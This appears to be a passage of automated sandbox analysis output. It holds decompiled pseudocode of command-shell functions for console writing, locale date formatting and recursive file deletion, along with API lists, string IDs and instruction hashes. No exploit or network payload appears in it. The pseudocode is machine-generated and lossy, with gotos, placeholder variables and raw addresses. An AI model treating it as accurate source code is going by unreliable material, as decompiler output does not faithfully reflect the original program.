                                                      							_t149 = _v4124;
                                                      							goto L20;
                                                      						} else {
                                                      							_t149 = _t140 >> 1;
                                                      							__eflags = _t149;
                                                      							L20:
                                                      							_v4132 = _t149;
                                                      							L38:
                                                      							__eflags = _v4160 - _t214;
                                                      							if(_v4160 != _t214) {
                                                      								__eflags =  *0x4a7540f4 - _t214; // 0x0
                                                      								if(__eflags != 0) {
                                                      									E4A736D44(_t191, 0x2354, 1, _v4172);
                                                      									_t219 = _t219 + 0xc;
                                                      								}
                                                      								_t149 = _v4132;
                                                      								_v4160 = _t214;
                                                      							}
                                                      							__eflags = _t149 - _t214;
                                                      							_t211 = _v4148;
                                                      							_v4128 = _t149;
                                                      							if(_t149 <= _t214) {
                                                      								L67:
                                                      								__eflags = _v4156 | _v4152;
                                                      								if((_v4156 | _v4152) != 0) {
                                                      									__eflags = 0;
                                                      									 *_t186( &_v4156, 1);
                                                      									SetFilePointerEx(0, _v4120.LowPart, 0, 0);
                                                      								}
                                                      								__eflags = _v4124 - _v4144;
                                                      								if(_v4124 != _v4144) {
                                                      									goto L6;
                                                      								} else {
                                                      									__eflags = _v4164 - _v4152;
                                                      									if(__eflags < 0) {
                                                      										goto L6;
                                                      									}
                                                      									if(__eflags > 0) {
                                                      										L73:
                                                      										_t211 = 1;
                                                      										continue;
                                                      									}
                                                      									__eflags = _v4168 - _v4156;
                                                      									if(_v4168 <= _v4156) {
                                                      										goto L6;
                                                      									}
                                                      									goto L73;
                                                      								}
                                                      							} else {
                                                      								do {
                                                      									_t215 = 0x50;
                                                      									__eflags = _v4128 - _t215;
                                                      									if(_v4128 > _t215) {
                                                      										L45:
                                                      										__eflags =  *0x4a7541b4;
                                                      										if( *0x4a7541b4 != 0) {
                                                      											E4A733AB3(_v4120.LowPart);
                                                      											_t214 = 1;
                                                      											goto L7;
                                                      										}
                                                      										_t160 = E4A734490(_t149, 1);
                                                      										__eflags = _t160;
                                                      										if(_t160 == 0) {
                                                      											__eflags =  *0x4a770668;
                                                      											if( *0x4a770668 != 0) {
                                                      												__eflags = _v4140;
                                                      												if(_v4140 == 0) {
                                                      													L55:
                                                      													_t187 = _t215 + _t215;
                                                      													_t162 = E4A73453E( &_v4136, 1, _t211, _t187,  &_v4136);
                                                      													__eflags = _v4140;
                                                      													if(_v4140 != 0) {
                                                      														 *((short*)(_t187 + _t211)) = _v4176;
                                                      													}
                                                      													_t191 = _v4136;
                                                      													_t186 = __imp___get_osfhandle;
                                                      													_t208 = _t191 >> 1;
                                                      													_t102 =  &_v4128;
                                                      													 *_t102 = _v4128 - (_t191 >> 1);
                                                      													__eflags =  *_t102;
                                                      													L58:
                                                      													_t211 = _t211 + _t191;
                                                      													__eflags = _t211;
                                                      													L59:
                                                      													__eflags = _t162;
                                                      													if(_t162 == 0) {
                                                      														L61:
                                                      														_t163 = GetLastError();
                                                      														 *0x4a754128 = _t163;
                                                      														__eflags = _t163;
                                                      														if(_t163 == 0) {
                                                      															 *0x4a754128 = 0x70;
                                                      														}
                                                      														_t214 = 1;
                                                      														_t164 = E4A733B03(_t163, _t191, 1);
                                                      														__eflags = _t164;
                                                      														if(_t164 == 0) {
                                                      															_t165 = E4A736BEA(_t164, 1);
                                                      															__eflags = _t165;
                                                      															if(_t165 == 0) {
                                                      																E4A74056B( *0x4a754128);
                                                      																goto L6;
                                                      															}
                                                      															_push(0);
                                                      															_push(0x2364);
                                                      															goto L76;
                                                      														} else {
                                                      															_push(0);
                                                      															_push(0x1d);
                                                      															_t149 = E4A736D44(_t191);
                                                      															goto L65;
                                                      														}
                                                      													}
                                                      													_t149 = _t215 + _t215;
                                                      													__eflags = _t191 - _t215 + _t215;
                                                      													if(_t191 == _t215 + _t215) {
                                                      														goto L65;
                                                      													}
                                                      													goto L61;
                                                      												}
                                                      												L54:
                                                      												_v4176 =  *(_t211 + _t215 * 2) & 0x0000ffff;
                                                      												__eflags = 0;
                                                      												 *(_t211 + _t215 * 2) = 0;
                                                      												goto L55;
                                                      											}
                                                      											__eflags = _v4140;
                                                      											if(_v4140 != 0) {
                                                      												goto L54;
                                                      											}
                                                      											L52:
                                                      											_t162 = WriteFile( *_t186(0), 1, _t211, _t215,  &_v4136);
                                                      											_t201 = _v4136;
                                                      											_v4128 = _v4128 - _t201;
                                                      											_t211 = _t211 + _t201;
                                                      											_t191 = _t201 + _t201;
                                                      											_v4136 = _t191;
                                                      											goto L59;
                                                      										}
                                                      										_t162 = WriteConsoleW(GetStdHandle(0xfffffff5), _t211, _t215,  &_v4136, 0);
                                                      										__eflags = _t162;
                                                      										if(_t162 == 0) {
                                                      											goto L52;
                                                      										}
                                                      										_t202 = _v4136;
                                                      										__eflags = _t202 - _t215;
                                                      										if(_t202 != _t215) {
                                                      											goto L52;
                                                      										}
                                                      										_v4128 = _v4128 - _t202;
                                                      										_t191 = _t202 + _t202;
                                                      										_v4136 = _t191;
                                                      										goto L58;
                                                      									}
                                                      									_t215 = _v4128;
                                                      									__eflags = _t215;
                                                      									if(_t215 == 0) {
                                                      										break;
                                                      									}
                                                      									goto L45;
                                                      									L65:
                                                      									__eflags = _v4128;
                                                      								} while (_v4128 > 0);
                                                      								_t214 = 0;
                                                      								__eflags = 0;
                                                      								goto L67;
                                                      							}
                                                      						}
                                                      					}
                                                      					goto L6;
                                                      				}
                                                      				E4A733AB3(_v4120);
                                                      				goto L14;
                                                      			}
                                                      0x4a7463dd
                                                      0x4a7463df
                                                      0x00000000
                                                      0x4a7463e5
                                                      0x4a7463d5
                                                      0x4a7463aa
                                                      0x4a7463ad
                                                      0x4a7463af
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7463af
                                                      0x4a746357
                                                      0x4a74635b
                                                      0x4a746361
                                                      0x4a746363
                                                      0x00000000
                                                      0x4a746363
                                                      0x4a746316
                                                      0x4a74631d
                                                      0x00000000
                                                      0x00000000
                                                      0x4a74631f
                                                      0x4a746330
                                                      0x4a746336
                                                      0x4a74633c
                                                      0x4a746342
                                                      0x4a746344
                                                      0x4a746346
                                                      0x00000000
                                                      0x4a746346
                                                      0x4a7462e6
                                                      0x4a7462ec
                                                      0x4a7462ee
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7462f0
                                                      0x4a7462f6
                                                      0x4a7462f8
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7462fa
                                                      0x4a746300
                                                      0x4a746302
                                                      0x00000000
                                                      0x4a746302
                                                      0x4a7462ac
                                                      0x4a7462b2
                                                      0x4a7462b4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7463e6
                                                      0x4a7463e6
                                                      0x4a7463e6
                                                      0x4a7463f3
                                                      0x4a7463f3
                                                      0x00000000
                                                      0x4a7463f3
                                                      0x4a74629b
                                                      0x4a746150
                                                      0x00000000
                                                      0x4a743abc
                                                      0x4a746466
                                                      0x00000000

                                                      APIs
                                                      • SearchPathW.KERNEL32 ref: 4A7460AC
                                                        • Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
                                                        • Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17
                                                      • _get_osfhandle.MSVCRT ref: 4A743A4D
                                                      • GetFileSize.KERNEL32(00000000), ref: 4A743A51
                                                      • _get_osfhandle.MSVCRT ref: 4A743A66
                                                      • SetFilePointer.KERNEL32(00000000), ref: 4A743A6A
                                                      • _get_osfhandle.MSVCRT ref: 4A743AA2
                                                      • ReadFile.KERNEL32(00000000), ref: 4A743AAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File_get_osfhandle$PathPointerReadSearchSizeType
                                                      • String ID: DPATH
                                                      • API String ID: 1209024715-2010427443
                                                      • Opcode ID: 54aa06ad3257d601e8cec87d17f6c7daff9c765d967babf085eeeb122e2833dd
                                                      • Instruction ID: c13f944efe92c87ce24dd242eea254dd4c77500765baaf744c19b772d4421822
                                                      • Opcode Fuzzy Hash: 54aa06ad3257d601e8cec87d17f6c7daff9c765d967babf085eeeb122e2833dd
                                                      • Instruction Fuzzy Hash: A3E183B1D492A8EBDF708B60CC89ADDBBB8EB04750F0141D6E589E6141D7B49EC8CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E4A74270D(intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				char _v72;
                                                      				short _v328;
                                                      				signed int _v332;
                                                      				signed int _v336;
                                                      				int _v340;
                                                      				signed short _v350;
                                                      				signed short _v352;
                                                      				signed short _v354;
                                                      				struct _SYSTEMTIME _v356;
                                                      				struct _FILETIME _v364;
                                                      				struct _FILETIME _v372;
                                                      				void _v408;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t72;
                                                      				intOrPtr _t84;
                                                      				signed int _t93;
                                                      				int _t96;
                                                      				void* _t107;
                                                      				int _t109;
                                                      				int _t110;
                                                      				int _t120;
                                                      				long _t125;
                                                      				short* _t127;
                                                      				void* _t134;
                                                      				void* _t135;
                                                      				void* _t141;
                                                      				int _t149;
                                                      				void* _t155;
                                                      				signed int _t160;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				void _t165;
                                                      				int _t168;
                                                      				void _t169;
                                                      				int _t171;
                                                      				void* _t175;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      
                                                      				_t72 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t72 ^ _t176;
                                                      				_v340 = _a12;
                                                      				_v332 = 1;
                                                      				if(_a4 == 0) {
                                                      					GetSystemTime( &_v356);
                                                      					SystemTimeToFileTime( &_v356,  &_v364);
                                                      				} else {
                                                      					__ecx = 9;
                                                      					 &_v364 =  &_v408;
                                                      					__edi =  &_v408;
                                                      					__eax = memcpy( &_v408, __esi, __ecx << 2);
                                                      					__edi = __esi + __ecx;
                                                      					__edi = __esi + __ecx + __ecx;
                                                      					__ecx = 0;
                                                      					__eax = E4A7430B6( &_v408,  &_v364);
                                                      				}
                                                      				FileTimeToLocalFileTime( &_v364,  &_v372);
                                                      				FileTimeToSystemTime( &_v372,  &_v356);
                                                      				if( *0x4a754081 == 0) {
                                                      					_t171 = _v354 & 0x0000ffff;
                                                      					_t168 = _v350 & 0x0000ffff;
                                                      					_t149 = _v356 & 0x0000ffff;
                                                      					if(_a8 == 0) {
                                                      						_t160 = 0x64;
                                                      						_t59 = _t149 % _t160;
                                                      						_t166 = _t59;
                                                      						_t149 = _t59;
                                                      					}
                                                      					_t84 =  *0x4a7541d0; // 0x0
                                                      					if(_t84 != 2) {
                                                      						if(_t84 == 1) {
                                                      							_t109 = _t171;
                                                      							_t171 = _t168;
                                                      							_t168 = _t109;
                                                      						}
                                                      					} else {
                                                      						_t110 = _t149;
                                                      						_t149 = _t168;
                                                      						_t168 = _t171;
                                                      						_t171 = _t110;
                                                      					}
                                                      					if( *0x4a7540dc >= 0x20) {
                                                      						L55:
                                                      						_push(_t149);
                                                      						_push(0x4a754940);
                                                      						_push(_t168);
                                                      						_push(0x4a754940);
                                                      						E4A73179D( *0x4a7540d8,  *0x4a7540dc, L"%02d%s%02d%s%02d", _t171);
                                                      						_t149 = _v340;
                                                      						_t177 = _t177 + 0x20;
                                                      						goto L19;
                                                      					} else {
                                                      						_t107 = realloc( *0x4a7540d8, 0x40);
                                                      						_pop(_t157);
                                                      						if(_t107 == 0) {
                                                      							L45:
                                                      							_push(0);
                                                      							_push(8);
                                                      							L44:
                                                      							E4A736D44(_t157);
                                                      							_t93 = 0;
                                                      							goto L26;
                                                      						}
                                                      						 *0x4a7540d8 = _t107;
                                                      						 *0x4a7540dc = 0x20;
                                                      						goto L55;
                                                      					}
                                                      				} else {
                                                      					_v336 = _v336 & 0x00000000;
                                                      					if(GetLocaleInfoW(E4A73756D(), 0x1f,  &_v328, 0x80) == 0) {
                                                      						E4A73185A( &_v328, 0x80,  *0x4a7541cc);
                                                      					}
                                                      					_t171 =  &_v328;
                                                      					if(_v328 == 0) {
                                                      						L17:
                                                      						_t120 = E4A73756D();
                                                      						_t168 = GetDateFormatW;
                                                      						if(GetDateFormatW(_t120, 0,  &_v356,  &_v328,  *0x4a7540d8,  *0x4a7540dc) == 0 ||  *0x4a7540d8 == 0) {
                                                      							goto L1;
                                                      						} else {
                                                      							L19:
                                                      							E4A73185A( &_v72, 0x20, E4A742B93(_v352 & 0x0000ffff));
                                                      							if(_t149 == 0) {
                                                      								if(_v332 != _t149) {
                                                      									if(E4A73661C() == 0) {
                                                      										_push( *0x4a7540d8);
                                                      										_push( &_v72);
                                                      									} else {
                                                      										_push( &_v72);
                                                      										_push( *0x4a7540d8);
                                                      									}
                                                      									_push(L"%s %s ");
                                                      									_t93 = E4A7358F3();
                                                      								} else {
                                                      									_t93 = E4A7358F3("%s ",  *0x4a7540d8);
                                                      								}
                                                      								L26:
                                                      								return E4A7313A9(_t93, _t149, _v8 ^ _t176, _t166, _t168, _t171);
                                                      							}
                                                      							if(_v332 == 0 || _a8 != 1) {
                                                      								E4A73185A(_t149, _a16,  *0x4a7540d8);
                                                      							} else {
                                                      								if(E4A73661C() == 0) {
                                                      									E4A73185A(_t149, _a16,  &_v72);
                                                      									E4A7320A9(_t171, _t149, _a16, E4A7325B8);
                                                      									_push( *0x4a7540d8);
                                                      								} else {
                                                      									E4A73185A(_t149, _a16,  *0x4a7540d8);
                                                      									E4A7320A9(_t171, _t149, _a16, E4A7325B8);
                                                      									_push( &_v72);
                                                      								}
                                                      								_push(_a16);
                                                      								_push(_t149);
                                                      								E4A7320A9(_t171);
                                                      							}
                                                      							_t96 = _t149;
                                                      							_t166 = _t96 + 2;
                                                      							do {
                                                      								_t155 =  *_t96;
                                                      								_t96 = _t96 + 2;
                                                      							} while (_t155 != 0);
                                                      							_t93 = _t96 - _t166 >> 1;
                                                      							goto L26;
                                                      						}
                                                      					} else {
                                                      						do {
                                                      							_t166 =  *_t171 & 0x0000ffff;
                                                      							if(_t166 == 0x27) {
                                                      								_v336 = 0 | _v336 == 0x00000000;
                                                      								L14:
                                                      								_t171 = _t171 + 2;
                                                      								goto L15;
                                                      							}
                                                      							if(_v336 != 0 || _t166 != 0x64 && _t166 != 0x4d) {
                                                      								goto L14;
                                                      							} else {
                                                      								_t163 = 0;
                                                      								do {
                                                      									_t163 = _t163 + 1;
                                                      									_t171 = _t171 + 2;
                                                      								} while ( *_t171 == _t166);
                                                      								_t134 = _t163 + _t163;
                                                      								_t175 = _t171 - _t134;
                                                      								if(_t163 != 1) {
                                                      									if(_t166 == 0x64) {
                                                      										_v332 = _v332 & 0x00000000;
                                                      									}
                                                      									if(_t163 <= 3) {
                                                      										_t171 = _t175 + _t134;
                                                      									} else {
                                                      										_t164 = _t134 + _t175;
                                                      										_t135 = _t164;
                                                      										_t51 = _t135 + 2; // 0x3
                                                      										_t166 = _t51;
                                                      										do {
                                                      											_t169 =  *_t135;
                                                      											_t135 = _t135 + 2;
                                                      										} while (_t169 != 0);
                                                      										_t171 = _t175 + 6;
                                                      										memmove(_t171, _t164, (_t135 - _t166 >> 1) + (_t135 - _t166 >> 1) + 2);
                                                      										_t177 = _t177 + 0xc;
                                                      									}
                                                      									goto L15;
                                                      								}
                                                      								_t141 = _t175;
                                                      								_t36 = _t141 + 2; // 0x4
                                                      								_t166 = _t36;
                                                      								do {
                                                      									_t165 =  *_t141;
                                                      									_t141 = _t141 + 2;
                                                      								} while (_t165 != 0);
                                                      								_t39 = _t175 + 2; // 0x4
                                                      								memmove(_t39, _t175, (_t141 - _t166 >> 1) + (_t141 - _t166 >> 1) + 2);
                                                      								_t177 = _t177 + 0xc;
                                                      								_t171 = _t175 + 4;
                                                      							}
                                                      							L15:
                                                      						} while ( *_t171 != 0);
                                                      						_t149 = _v340;
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      				L1:
                                                      				_t157 =  &_v356;
                                                      				_t171 = GetDateFormatW(E4A73756D(), 0,  &_v356,  &_v328, 0, 0);
                                                      				if(_t171 == 0) {
                                                      					L43:
                                                      					_t125 = GetLastError();
                                                      					_push(0);
                                                      					 *0x4a754128 = _t125;
                                                      					_push(_t125);
                                                      					goto L44;
                                                      				}
                                                      				_t171 = _t171 + 1;
                                                      				_t127 = realloc( *0x4a7540d8, _t171 + _t171);
                                                      				_pop(_t157);
                                                      				if(_t127 == 0) {
                                                      					goto L45;
                                                      				}
                                                      				 *0x4a7540d8 = _t127;
                                                      				 *0x4a7540dc = _t171;
                                                      				if(GetDateFormatW(E4A73756D(), 0,  &_v356,  &_v328, _t127, _t171) != 0) {
                                                      					goto L19;
                                                      				} else {
                                                      					goto L43;
                                                      				}
                                                      			}

                                                      0x4a744fc9
                                                      0x4a744fd4
                                                      0x4a744fda
                                                      0x4a744fcb
                                                      0x4a744fcb
                                                      0x4a744fcc
                                                      0x4a744fcc
                                                      0x4a744fdb
                                                      0x4a744fe0
                                                      0x4a744fa8
                                                      0x4a744fb3
                                                      0x4a744fb9
                                                      0x4a7428a3
                                                      0x4a7428b1
                                                      0x4a7428b1
                                                      0x4a742875
                                                      0x4a74288b
                                                      0x4a744fed
                                                      0x4a744ff4
                                                      0x4a745021
                                                      0x4a74502f
                                                      0x4a745034
                                                      0x4a744ff6
                                                      0x4a745000
                                                      0x4a74500e
                                                      0x4a745016
                                                      0x4a745016
                                                      0x4a74503a
                                                      0x4a74503d
                                                      0x4a74503e
                                                      0x4a74503e
                                                      0x4a742890
                                                      0x4a742892
                                                      0x4a742895
                                                      0x4a742895
                                                      0x4a742899
                                                      0x4a74289a
                                                      0x4a7428a1
                                                      0x00000000
                                                      0x4a7428a1
                                                      0x4a7427d0
                                                      0x4a7427d6
                                                      0x4a7427d6
                                                      0x4a7427dd
                                                      0x4a744e91
                                                      0x4a742800
                                                      0x4a742801
                                                      0x00000000
                                                      0x4a742801
                                                      0x4a7427ea
                                                      0x00000000
                                                      0x4a7428b4
                                                      0x4a7428b4
                                                      0x4a7428b6
                                                      0x4a7428b6
                                                      0x4a7428b8
                                                      0x4a7428b9
                                                      0x4a7428be
                                                      0x4a7428c1
                                                      0x4a7428c6
                                                      0x4a744ea0
                                                      0x4a744ea2
                                                      0x4a744ea2
                                                      0x4a744eac
                                                      0x4a744ed8
                                                      0x4a744eae
                                                      0x4a744eae
                                                      0x4a744eb1
                                                      0x4a744eb3
                                                      0x4a744eb3
                                                      0x4a744eb6
                                                      0x4a744eb6
                                                      0x4a744eba
                                                      0x4a744ebb
                                                      0x4a744eca
                                                      0x4a744ece
                                                      0x4a744ed0
                                                      0x4a744ed0
                                                      0x00000000
                                                      0x4a744eac
                                                      0x4a7428cc
                                                      0x4a7428ce
                                                      0x4a7428ce
                                                      0x4a7428d1
                                                      0x4a7428d1
                                                      0x4a7428d5
                                                      0x4a7428d6
                                                      0x4a7428e4
                                                      0x4a7428e9
                                                      0x4a7428eb
                                                      0x4a7428ee
                                                      0x4a7428ee
                                                      0x4a742802
                                                      0x4a742802
                                                      0x4a742808
                                                      0x00000000
                                                      0x4a742808
                                                      0x4a7427ce
                                                      0x4a742696
                                                      0x4a7426a1
                                                      0x4a7426b1
                                                      0x4a7426b5
                                                      0x4a744edf
                                                      0x4a744edf
                                                      0x4a744ee5
                                                      0x4a744ee7
                                                      0x4a744eec
                                                      0x00000000
                                                      0x4a744eec
                                                      0x4a7426bb
                                                      0x4a7426c6
                                                      0x4a7426cd
                                                      0x4a7426d0
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7426d8
                                                      0x4a7426ed
                                                      0x4a7426fd
                                                      0x00000000
                                                      0x4a742703
                                                      0x00000000
                                                      0x4a742703

                                                      APIs
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,00002000,4A760640,75A9A9E9), ref: 4A74276F
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 4A742783
                                                      • GetLocaleInfoW.KERNEL32(00000000,0000001F,?,00000080), ref: 4A7427B2
                                                      • GetDateFormatW.KERNEL32 ref: 4A742836
                                                      • memmove.MSVCRT ref: 4A7428E9
                                                      • GetSystemTime.KERNEL32(?,00002000,4A760640,75A9A9E9), ref: 4A744E4F
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A744E63
                                                        • Part of subcall function 4A7430B6: SystemTimeToFileTime.KERNEL32(?,00002000,?,00002000,4A760640,75A9A9E9), ref: 4A74310F
                                                      • realloc.MSVCRT ref: 4A744F57
                                                        • Part of subcall function 4A73756D: GetUserDefaultLCID.KERNEL32(4A7427B1,0000001F,?,00000080), ref: 4A73756D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                      • API String ID: 1795611712-4023967598
                                                      • Opcode ID: cbc809ef69449068f0fb82ebb803d9eb0e5ab27a0cfba2ea5007750e429ff4d6
                                                      • Instruction ID: 015411a66b4d2b94adaa833b8fa8eac4470f3c306806b146f40a363f05defadd
                                                      • Opcode Fuzzy Hash: cbc809ef69449068f0fb82ebb803d9eb0e5ab27a0cfba2ea5007750e429ff4d6
                                                      • Instruction Fuzzy Hash: 99B1D7B2948225EBDF708FA0CC45EDA7BBDEB09310F1200A5E609DB551DB31DA5CCBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E4A750492(void* __edi, WCHAR* _a4, intOrPtr* _a8) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				struct _WIN32_FIND_DATAW _v1120;
                                                      				WCHAR* _v1124;
                                                      				signed int* _v1128;
                                                      				long _v1132;
                                                      				void* _v1136;
                                                      				char _v1140;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				signed int _t84;
                                                      				intOrPtr* _t86;
                                                      				WCHAR* _t87;
                                                      				signed int _t89;
                                                      				void* _t93;
                                                      				void* _t95;
                                                      				signed int _t100;
                                                      				void* _t105;
                                                      				short* _t107;
                                                      				signed int _t109;
                                                      				signed int _t110;
                                                      				signed int _t117;
                                                      				long _t122;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr* _t135;
                                                      				WCHAR* _t152;
                                                      				intOrPtr* _t159;
                                                      				intOrPtr* _t160;
                                                      				void* _t163;
                                                      				short* _t168;
                                                      				long _t173;
                                                      				short _t174;
                                                      				short _t177;
                                                      				intOrPtr _t181;
                                                      				intOrPtr* _t182;
                                                      				intOrPtr* _t183;
                                                      				short* _t187;
                                                      				signed int _t191;
                                                      				void* _t192;
                                                      
                                                      				_t188 = __edi;
                                                      				_t84 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t84 ^ _t191;
                                                      				_t86 = _a8;
                                                      				_t190 = _a4;
                                                      				_v1128 = _t86;
                                                      				 *_t86 = 1;
                                                      				_t87 = _t190;
                                                      				_v1124 = _t190;
                                                      				_t187 =  &(_t87[1]);
                                                      				do {
                                                      					_t174 =  *_t87;
                                                      					_t87 =  &(_t87[1]);
                                                      				} while (_t174 != 0);
                                                      				_t89 = _t87 - _t187;
                                                      				_t173 = _t89 >> 1;
                                                      				_v1132 = _t173;
                                                      				if(_t89 != 0) {
                                                      					_push(__edi);
                                                      					if(_t173 + 3 <= 0x104) {
                                                      						_t190 = FindFirstFileW;
                                                      						_t93 = FindFirstFileW(FindFirstFileW,  &_v1120);
                                                      						if(_t93 != 0xffffffff) {
                                                      							FindClose(_t93);
                                                      						} else {
                                                      							_v1120.dwReserved0 = _v1120.dwReserved0 & 0x00000000;
                                                      							_v1120.dwFileAttributes = 0x10;
                                                      						}
                                                      						if((_v1120.dwFileAttributes & 0x00000010) == 0 || (_v1120.dwFileAttributes & 0x00000400) != 0 && (_v1120.dwReserved0 & 0x20000000) != 0) {
                                                      							L69:
                                                      							_push(_v1124);
                                                      							goto L70;
                                                      						} else {
                                                      							E4A73185A( &_v528, 0x104, _v1124);
                                                      							_t100 =  *(_v1124 + _t173 * 2 - 2) & 0x0000ffff;
                                                      							if(_t100 != 0x3a && _t100 != 0x5c) {
                                                      								E4A7320A9(_t190,  &_v528, 0x104, E4A732EC8);
                                                      								_t173 = _t173 + 1;
                                                      								_v1132 = _t173;
                                                      							}
                                                      							E4A7320A9(_t190,  &_v528, 0x104, E4A739FFC);
                                                      							_t105 = FindFirstFileW( &_v528,  &_v1120);
                                                      							_v1136 = _t105;
                                                      							if(_t105 == 0xffffffff) {
                                                      								goto L69;
                                                      							} else {
                                                      								while( *0x4a7541b4 == 0) {
                                                      									_t187 =  &(_v1120.cAlternateFileName);
                                                      									_t107 = _t187;
                                                      									_t190 =  &(_t107[1]);
                                                      									do {
                                                      										_t177 =  *_t107;
                                                      										_t107 =  &(_t107[1]);
                                                      									} while (_t177 != 0);
                                                      									_t109 = _t107 - _t190;
                                                      									_t110 = _t109 >> 1;
                                                      									if(_t109 != 0) {
                                                      										L23:
                                                      										_push(_t187);
                                                      										if(_t110 + _t173 >= 0x104) {
                                                      											 *_v1128 =  *_v1128 & 0x00000000;
                                                      											E4A736D44(_t177, 0x400023da, 2, _v1124);
                                                      											break;
                                                      										}
                                                      										_push(0x104 - _t173);
                                                      										_t190 = _t191 + _t173 * 2 - 0x20c;
                                                      										_push(_t190);
                                                      										E4A73185A();
                                                      										_t117 = _v1120.dwFileAttributes;
                                                      										_t173 = _t117;
                                                      										if((_t117 & 0x00000010) == 0) {
                                                      											if((_t117 & 0x00000001) != 0) {
                                                      												SetFileAttributesW( &_v528, _t117 & 0xfffffffe);
                                                      											}
                                                      											if(DeleteFileW( &_v528) != 0) {
                                                      												L63:
                                                      												if(FindNextFileW(_v1136,  &_v1120) == 0) {
                                                      													break;
                                                      												}
                                                      												_t173 = _v1132;
                                                      												continue;
                                                      											} else {
                                                      												_t122 = GetLastError();
                                                      												if(_t122 == 0x4d3) {
                                                      													break;
                                                      												}
                                                      												if(_t122 == 3) {
                                                      													_t152 =  &_v528;
                                                      													__imp___wcsnicmp(_t152, L"\\\\?\\", 4);
                                                      													_t192 = _t192 + 0xc;
                                                      													if(_t152 != 0 && GetFullPathNameW( &_v528, 0, 0, 0) > 0x104) {
                                                      														SetLastError(0x6f);
                                                      													}
                                                      												}
                                                      												_t123 =  &(_v1120.cAlternateFileName);
                                                      												_t187 = _t123 + 2;
                                                      												do {
                                                      													_t178 =  *_t123;
                                                      													_t123 = _t123 + 2;
                                                      												} while (_t178 != 0);
                                                      												if(_t123 == _t187) {
                                                      													L61:
                                                      													E4A736D44(_t178, 0x4000271b, 1,  &_v528);
                                                      													_t192 = _t192 + 0xc;
                                                      													L62:
                                                      													_push(0);
                                                      													_push(GetLastError());
                                                      													E4A736D44(_t178);
                                                      													SetFileAttributesW( &_v528, _t173);
                                                      													 *_v1128 =  *_v1128 & 0x00000000;
                                                      													goto L63;
                                                      												}
                                                      												 *_t190 = 0;
                                                      												_t135 =  &(_v1120.cFileName);
                                                      												_t187 = _t135 + 2;
                                                      												do {
                                                      													_t181 =  *_t135;
                                                      													_t135 = _t135 + 2;
                                                      												} while (_t181 != 0);
                                                      												_t178 = _v1132;
                                                      												if((_t135 - _t187 >> 1) + _v1132 < 0x104) {
                                                      													E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cFileName));
                                                      													E4A736D44(_t178, 0x4000271b, 1,  &_v528);
                                                      													_t192 = _t192 + 0xc;
                                                      													 *_t190 = 0;
                                                      													E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
                                                      													goto L62;
                                                      												}
                                                      												E4A7320A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
                                                      												goto L61;
                                                      											}
                                                      										}
                                                      										_t182 = E4A732EC4;
                                                      										_t159 =  &(_v1120.cFileName);
                                                      										while(1) {
                                                      											_t187 =  *_t159;
                                                      											if(_t187 !=  *_t182) {
                                                      												break;
                                                      											}
                                                      											if(_t187 == 0) {
                                                      												L30:
                                                      												_t159 = 0;
                                                      												L32:
                                                      												if(_t159 == 0) {
                                                      													goto L63;
                                                      												}
                                                      												_t183 = E4A732EBC;
                                                      												_t160 =  &(_v1120.cFileName);
                                                      												while(1) {
                                                      													_t187 =  *_t160;
                                                      													if(_t187 !=  *_t183) {
                                                      														break;
                                                      													}
                                                      													if(_t187 == 0) {
                                                      														L38:
                                                      														_t160 = 0;
                                                      														L40:
                                                      														if(_t160 == 0) {
                                                      															goto L63;
                                                      														}
                                                      														_t163 = E4A750492(0x104,  &_v528,  &_v1140);
                                                      														if( *0x4a7541b4 != 0) {
                                                      															goto L67;
                                                      														}
                                                      														if(_t163 != 0) {
                                                      															_t184 = _v1128;
                                                      															 *_v1128 =  *_v1128 & 0x00000000;
                                                      															if(_t163 != 0x91 || _v1140 != 0) {
                                                      																E4A736D44(_t184, 0x4000271b, 1,  &_v528);
                                                      																_t192 = _t192 + 0xc;
                                                      																_push(0);
                                                      																_push(GetLastError());
                                                      																E4A736D44(_t184);
                                                      															}
                                                      														}
                                                      														goto L63;
                                                      													}
                                                      													_t187 =  *((intOrPtr*)(_t160 + 2));
                                                      													_t49 = _t183 + 2; // 0x2e
                                                      													if(_t187 !=  *_t49) {
                                                      														break;
                                                      													}
                                                      													_t160 = _t160 + 4;
                                                      													_t183 = _t183 + 4;
                                                      													if(_t187 != 0) {
